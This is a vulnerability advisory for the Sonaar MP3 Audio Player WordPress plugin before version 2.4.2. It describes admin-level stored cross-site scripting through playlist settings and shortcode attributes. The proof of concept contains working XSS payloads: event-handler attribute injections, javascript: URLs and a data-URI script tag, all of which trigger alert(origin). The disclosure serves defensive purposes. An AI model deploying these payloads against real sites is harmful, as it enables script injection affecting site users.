WordPress Plugin Vulnerabilities
MP3 Audio Player for Music, Radio & Podcast by Sonaar < 2.4.2 - Multiple Admin+ Cross Site Scripting
Description
The plugin does not properly sanitize or escape data in some of its Playlist settings, allowing high privilege users to perform Cross-Site Scripting attacks
Proof of Concept
1) Add playlist with "Optional Call to Action"'s "Label" set to: " style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)// 2) Set "Optional Call to Action" and "External Links Button"'s "Link URL" to: javascript:alert(origin) 3) Post this shortcode: [sonaar_audioplayer play-latest="a" scrollbar='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1+origin)//' playlist_title='" style="animation-name:twentytwentyone-close-button-transition" onanimationstart="alert(2+origin)//' titletag_playlist='script src="data:text/javascript,alert(3+origin)" ']
Affects Plugins
Fixed in version 2.4.2
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-10-04 (about 9 months ago)
Added
2021-10-04 (about 9 months ago)
Last Updated
2022-04-15 (about 2 months ago)